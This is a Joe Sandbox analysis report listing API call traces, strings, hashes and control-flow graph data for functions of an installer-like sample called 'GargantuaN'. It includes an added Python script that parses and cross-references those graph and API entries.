                                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                        • API String ID: 1207345701-3298887752
                                                        Uniqueness
                                                        • Uniqueness Score: -1.00%
                                                        Control-flow Graph (rendered graph; legend: Executed / Not Executed)
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6C744
                                                          • Part of subcall function 00D6B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D6B3FB
                                                        • _wcslen.LIBCMT ref: 00D6CA0A
                                                        • _wcslen.LIBCMT ref: 00D6CA13
                                                        • SetWindowTextW.USER32(?,?), ref: 00D6CA71
                                                        • _wcslen.LIBCMT ref: 00D6CAB3
                                                        • _wcsrchr.LIBVCRUNTIME ref: 00D6CBFB
                                                        • GetDlgItem.USER32(?,00000066), ref: 00D6CC36
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00D6CC46
                                                        • SendMessageW.USER32(00000000,00000143,00000000,00D9A472), ref: 00D6CC54
                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D6CC7F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                        • API String ID: 2804936435-312220925
                                                        • Opcode ID: 7ea24b152318fe5ded822a03b10de3d58b322b72e68e3531baec4df676f384b2
                                                        • Instruction ID: 6e70748a79b6dea4ae771b1cccee7ce3e5db73811307c7f4784e8e6634596084
                                                        • Opcode Fuzzy Hash: 7ea24b152318fe5ded822a03b10de3d58b322b72e68e3531baec4df676f384b2
                                                        • Instruction Fuzzy Hash: D3E14272900218ABDF24DBA4DC85DEE73BCEB05350F4485A6FA49E7140EB749E849F70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D5DA70
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D5DAAC
                                                          • Part of subcall function 00D5C29A: _wcslen.LIBCMT ref: 00D5C2A2
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D61B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D5BAE9,00000000,?,?,?,0002047E), ref: 00D61BA0
                                                        • _wcslen.LIBCMT ref: 00D5DDE9
                                                        • __fprintf_l.LIBCMT ref: 00D5DF1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                        • API String ID: 566448164-801612888
                                                        • Opcode ID: 7a307d7935db588c51eb02cc1ad3929dc14b9f7f86e44e6269ba22d595598e17
                                                        • Instruction ID: a4458d8177f7e13e70b4d05bca24d8e7d595ddbe2a33dfbb609b58250aa1a552
                                                        • Opcode Fuzzy Hash: 7a307d7935db588c51eb02cc1ad3929dc14b9f7f86e44e6269ba22d595598e17
                                                        • Instruction Fuzzy Hash: 2D32C2719002189BCF28EF68C841AEE77A5FF14701F44455AFD4A97281EBB1DE89CB74
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D6B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6B579
                                                          • Part of subcall function 00D6B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B58A
                                                          • Part of subcall function 00D6B568: IsDialogMessageW.USER32(0002047E,?), ref: 00D6B59E
                                                          • Part of subcall function 00D6B568: TranslateMessage.USER32(?), ref: 00D6B5AC
                                                          • Part of subcall function 00D6B568: DispatchMessageW.USER32(?), ref: 00D6B5B6
                                                        • GetDlgItem.USER32(00000068,00DAFCB8), ref: 00D6D4E8
                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00D6AF07,00000001,?,?,00D6B7B9,00D8506C,00DAFCB8,00DAFCB8,00001000,00000000,00000000), ref: 00D6D510
                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6D51B
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6D529
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D53F
                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6D559
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D59D
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6D5AB
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D5BA
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D5E1
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D843F4), ref: 00D6D5F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                        • String ID: \
                                                        • API String ID: 3569833718-2967466578
                                                        • Opcode ID: 32b62bf12331ad747bde6f388ccf4ab248c727503f7b5ac4bcd1cf09bb5a5d99
                                                        • Instruction ID: d33bfa5cb058262f6b8bb55b4ed53a9564f1d41b960baace12fa8685cc7c3930
                                                        • Opcode Fuzzy Hash: 32b62bf12331ad747bde6f388ccf4ab248c727503f7b5ac4bcd1cf09bb5a5d99
                                                        • Instruction Fuzzy Hash: FE31D371545342EFD301EF20EC4AFAB7FACEF86704F000609F551D6290DB648A089B76
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (rendered graph omitted)
                                                        APIs
                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6D5
                                                        • SizeofResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6EC
                                                        • LoadResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A703
                                                        • LockResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A712
                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A72D
                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A73E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00D6A7C6
                                                          • Part of subcall function 00D6A626: GdipAlloc.GDIPLUS(00000010), ref: 00D6A62C
                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D6A7A7
                                                        • GlobalFree.KERNEL32(00000000), ref: 00D6A7CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                        • String ID: PNG
                                                        • API String ID: 541704414-364855578
                                                        • Opcode ID: 303deaee58e10d1b8502a703de4b47bacc1e7f922483fe05d5575d52c3bfea41
                                                        • Instruction ID: 2e0ba3b364504e95ab2b8f9890a0e7e581dbf4c8ff3ff4b29150ff14182bdd7e
                                                        • Opcode Fuzzy Hash: 303deaee58e10d1b8502a703de4b47bacc1e7f922483fe05d5575d52c3bfea41
                                                        • Instruction Fuzzy Hash: 63314F75600702AFD7109F25EC89D1BBBADEF84B51B040919F849D2761EB31D9489FB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (rendered graph omitted)
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D6D7AE
                                                        • ShellExecuteExW.SHELL32(?), ref: 00D6D8DE
                                                        • ShowWindow.USER32(?,00000000), ref: 00D6D91D
                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00D6D959
                                                        • CloseHandle.KERNEL32(?), ref: 00D6D97F
                                                        • ShowWindow.USER32(?,00000001), ref: 00D6D9E1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                        • String ID: .exe$.inf
                                                        • API String ID: 36480843-3750412487
                                                        • Opcode ID: 1a07afdf489b6bde8023d8a59bbb8a29a2c3dbb0afc060742f58485ce0ae53cb
                                                        • Instruction ID: 60af8ab9d99c9aa3f090247c3f126a78c04406f187e769e231f179f5f3f3d711
                                                        • Opcode Fuzzy Hash: 1a07afdf489b6bde8023d8a59bbb8a29a2c3dbb0afc060742f58485ce0ae53cb
                                                        • Instruction Fuzzy Hash: 9751C471A043809BDB319F64B844BABBBE6EF46744F08081EF9C5D7291D7718A48DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (rendered graph omitted)
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D75695,00D75695,?,?,?,00D7ABAC,00000001,00000001,2DE85006), ref: 00D7A9B5
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D7ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00D7AA3B
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D7AB35
                                                        • __freea.LIBCMT ref: 00D7AB42
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        • __freea.LIBCMT ref: 00D7AB4B
                                                        • __freea.LIBCMT ref: 00D7AB70
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: fb0bd9a9716a0707b8a0cb24558fd8f0e47f211c8d9790c6357e1d016ac5f338
                                                        • Instruction ID: 4c1ff594c378c6d400eb69ec57b114b3371a3180254dbc1d893fb13084069312
                                                        • Opcode Fuzzy Hash: fb0bd9a9716a0707b8a0cb24558fd8f0e47f211c8d9790c6357e1d016ac5f338
                                                        • Instruction Fuzzy Hash: 96519372610216ABDB258E68CC45EBFB7AAEB84750B298629FC08D6140FB34DC50D7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph (rendered graph omitted)
                                                        APIs
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00D73C35,?,?,00DB2088,00000000,?,00D73D60,00000004,InitializeCriticalSectionEx,00D86394,InitializeCriticalSectionEx,00000000), ref: 00D73C03
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FreeLibrary
                                                        • String ID: api-ms-
                                                        • API String ID: 3664257935-2084034818
                                                        • Opcode ID: ba28ce8a9395a823418c9fb06351ca69b916ee8b1efc01942c553c1e96a47efa
                                                        • Instruction ID: b90764adbd92021bfcbf33b73f66ccac5dffbc413c3ca11255474b53ed520732
                                                        • Opcode Fuzzy Hash: ba28ce8a9395a823418c9fb06351ca69b916ee8b1efc01942c553c1e96a47efa
                                                        • Instruction Fuzzy Hash: 6B11C632A45721ABCB229B68DC41B5937A49F01B70F294251E95DFB290F770EF0097F5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • OleInitialize.OLE32(00000000), ref: 00D6AC2F
                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6AC66
                                                        • SHGetMalloc.SHELL32(00D98438), ref: 00D6AC70
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                        • String ID: riched20.dll$3To
                                                        • API String ID: 3498096277-2168385784
                                                        • Opcode ID: 962f5327143ef5ec107cb2465077bae539534287b039948d4d2f13a9504a2c9b
                                                        • Instruction ID: aec576bd5b6013696894344b706053ef8bafcde9e0558be666c64cc9dbed5dfd
                                                        • Opcode Fuzzy Hash: 962f5327143ef5ec107cb2465077bae539534287b039948d4d2f13a9504a2c9b
                                                        • Instruction Fuzzy Hash: DDF0F4B590020AEFCB10AFA9DD499AFFFFCEF94700F00425AA815E2241DBB456059BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 998 d598e0-d59901 call d6ec50 1001 d59903-d59906 998->1001 1002 d5990c 998->1002 1001->1002 1003 d59908-d5990a 1001->1003 1004 d5990e-d5991f 1002->1004 1003->1004 1005 d59927-d59931 1004->1005 1006 d59921 1004->1006 1007 d59936-d59943 call d56edb 1005->1007 1008 d59933 1005->1008 1006->1005 1011 d59945 1007->1011 1012 d5994b-d5996a CreateFileW 1007->1012 1008->1007 1011->1012 1013 d5996c-d5998e GetLastError call d5bb03 1012->1013 1014 d599bb-d599bf 1012->1014 1019 d599c8-d599cd 1013->1019 1020 d59990-d599b3 CreateFileW GetLastError 1013->1020 1015 d599c3-d599c6 1014->1015 1018 d599d9-d599de 1015->1018 1015->1019 1022 d599e0-d599e3 1018->1022 1023 d599ff-d59a10 1018->1023 1019->1018 1021 d599cf 1019->1021 1020->1015 1024 d599b5-d599b9 1020->1024 1021->1018 1022->1023 1025 d599e5-d599f9 SetFileTime 1022->1025 1026 d59a12-d59a2a call d60602 1023->1026 1027 d59a2e-d59a39 1023->1027 1024->1015 1025->1023 1026->1027
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D57760,?,00000005,?,00000011), ref: 00D5995F
                                                        • GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D5996C
                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D57760,?,00000005,?), ref: 00D599A2
                                                        • GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599AA
                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599F9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                         • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmp
                                                         • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast$Time
                                                        • String ID:
                                                        • API String ID: 1999340476-0
                                                        • Opcode ID: f798f0b3b2585f6597baa8543e2f384a64a6c520d74cc84ca9fb0b69d9816e57
                                                        • Instruction ID: ae740b2d3630997e44bc6529f164838ef8aef5c2dad2f12c1505201cd204d4ab
                                                        • Opcode Fuzzy Hash: f798f0b3b2585f6597baa8543e2f384a64a6c520d74cc84ca9fb0b69d9816e57
                                                        • Instruction Fuzzy Hash: DA310230544345AFEB209F24CC46B9AFB98BB04321F241B19FDA5962D1D3B4A948CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
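Each entry above carries two machine-readable parts: the `control_flow_graph` token list (block id, address range, labels such as an imported API name or `call <addr>`, and `a->b` edges) and the `APIs` bullet lines with a `ref:` call-site address. The following parser, added here as an example and not part of the Joe Sandbox report or Joe Sandbox's own code, joins the two: it places every API reference in its basic block, checks that the block's own label names the same API, flags references in blocks the entry block cannot reach, and lists which calls can run before a chosen block. The sample input is the d598e0 (CreateFileW/SetFileTime) entry copied from this page; the token grammar is my reading of the report output, not a documented format.

```python
"""Parse one Joe Sandbox function entry (its 'control_flow_graph' token list and its 'APIs'
bullet lines) and join them. Added example, not Joe Sandbox code; the sample input is copied
from the d598e0 (CreateFileW/SetFileTime) entry on this page."""
import re
from collections import deque

SAMPLE_CFG = (
    "control_flow_graph 998 d598e0-d59901 call d6ec50 1001 d59903-d59906 998->1001 1002 d5990c 998->1002 "
    "1001->1002 1003 d59908-d5990a 1001->1003 1004 d5990e-d5991f 1002->1004 1003->1004 1005 d59927-d59931 "
    "1004->1005 1006 d59921 1004->1006 1007 d59936-d59943 call d56edb 1005->1007 1008 d59933 1005->1008 "
    "1006->1005 1011 d59945 1007->1011 1012 d5994b-d5996a CreateFileW 1007->1012 1008->1007 1011->1012 "
    "1013 d5996c-d5998e GetLastError call d5bb03 1012->1013 1014 d599bb-d599bf 1012->1014 1019 d599c8-d599cd "
    "1013->1019 1020 d59990-d599b3 CreateFileW GetLastError 1013->1020 1015 d599c3-d599c6 1014->1015 "
    "1018 d599d9-d599de 1015->1018 1015->1019 1022 d599e0-d599e3 1018->1022 1023 d599ff-d59a10 1018->1023 "
    "1019->1018 1021 d599cf 1019->1021 1020->1015 1024 d599b5-d599b9 1020->1024 1021->1018 1022->1023 "
    "1025 d599e5-d599f9 SetFileTime 1022->1025 1026 d59a12-d59a2a call d60602 1023->1026 1027 d59a2e-d59a39 "
    "1023->1027 1024->1015 1025->1023 1026->1027"
)
SAMPLE_APIS = """\
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D57760,?,00000005,?,00000011), ref: 00D5995F
• GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D5996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D57760,?,00000005,?), ref: 00D599A2
• GetLastError.KERNEL32(?,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D57760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D599F9
"""

# '• Api.MODULE(args), ref: ADDR'; optional 'Part of subcall function X:' prefix, and the
# argument list may be absent ('• GetLastError.KERNEL32 ref: 00D597DF' also occurs on the page).
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<api>\w+)\."
                    r"(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")                   # 'a->b'
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")  # 'start-end' or a single address

def parse_api_refs(text):
    """One dict per matching bullet line; 'ref' is the call-site address as an int."""
    refs = []
    for m in filter(None, map(API_RE.match, text.splitlines())):
        args = m.group("args")
        refs.append({"api": m.group("api"), "module": m.group("mod"), "subcall": m.group("sub"),
                     "args": args.split(",") if args else [], "ref": int(m.group("ref"), 16)})
    return refs

def parse_cfg(text):
    """Observed grammar: '<decimal id> <hex range>' declares a block, 'a->b' an edge, any other
    token labels the current block ('call <addr>' kept as one label). First block = entry."""
    toks = text.replace("control_flow_graph", "", 1).split()
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        e = EDGE_RE.match(toks[i])
        if e:
            edges.append((int(e.group(1)), int(e.group(2))))
            i += 1
        elif toks[i].isdigit():
            rng = RANGE_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
            if rng is None:
                raise ValueError("block id %s not followed by an address range" % toks[i])
            cur = int(toks[i])
            nodes[cur] = {"start": int(rng.group(1), 16),
                          "end": int(rng.group(2) or rng.group(1), 16), "labels": []}
            i += 2
        elif cur is None:
            raise ValueError("label %r before any block" % toks[i])
        elif toks[i] == "call" and i + 1 < len(toks):
            nodes[cur]["labels"].append("call " + toks[i + 1])
            i += 2
        else:
            nodes[cur]["labels"].append(toks[i])
            i += 1
    return nodes, edges

def block_for(nodes, addr):
    """Id of the block whose [start, end] range contains addr, or None."""
    return next((n for n, b in nodes.items() if b["start"] <= addr <= b["end"]), None)

def reachable(edges, start, reverse=False):
    """Block ids reachable from start (reverse=True: the blocks that can reach start)."""
    succ = {}
    for a, b in edges:
        succ.setdefault(b if reverse else a, []).append(a if reverse else b)
    seen, todo = {start}, deque([start])
    while todo:
        for nxt in succ.get(todo.popleft(), []):
            if nxt not in seen:
                seen.add(nxt)
                todo.append(nxt)
    return seen

def apis_before(nodes, edges, target):
    """Labels of every block that can reach target (target itself excluded)."""
    return {l for n in reachable(edges, target, reverse=True) - {target} for l in nodes[n]["labels"]}

def annotate(cfg_text, api_text):
    """Place each API ref in its block, check the block label names the same API, and flag
    refs in blocks the entry cannot reach (dead code, or a ref attributed to the wrong function)."""
    nodes, edges = parse_cfg(cfg_text)
    live = reachable(edges, next(iter(nodes)))
    rows = []
    for r in parse_api_refs(api_text):
        n = block_for(nodes, r["ref"])
        rows.append({"api": r["api"], "ref": "%08X" % r["ref"], "block": n,
                     "labelled": n is not None and r["api"] in nodes[n]["labels"],
                     "reachable_from_entry": n in live})
    return rows

if __name__ == "__main__":
    for row in annotate(SAMPLE_CFG, SAMPLE_APIS):
        print(row)
    nodes, edges = parse_cfg(SAMPLE_CFG)
    print("can precede SetFileTime:", sorted(apis_before(nodes, edges, block_for(nodes, 0xD599F9))))
```

Run stand-alone it prints one row per API reference (all five land in a block whose label names the same API and all are reachable from the entry block 998) and the set of calls that can precede the SetFileTime block, which is every call in the function except the `call d60602` block after it. Block ids are decimal and ranges hex in this output, so the parser distinguishes them by position (a range always follows an id) rather than by character class.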

                                                        Control-flow Graph

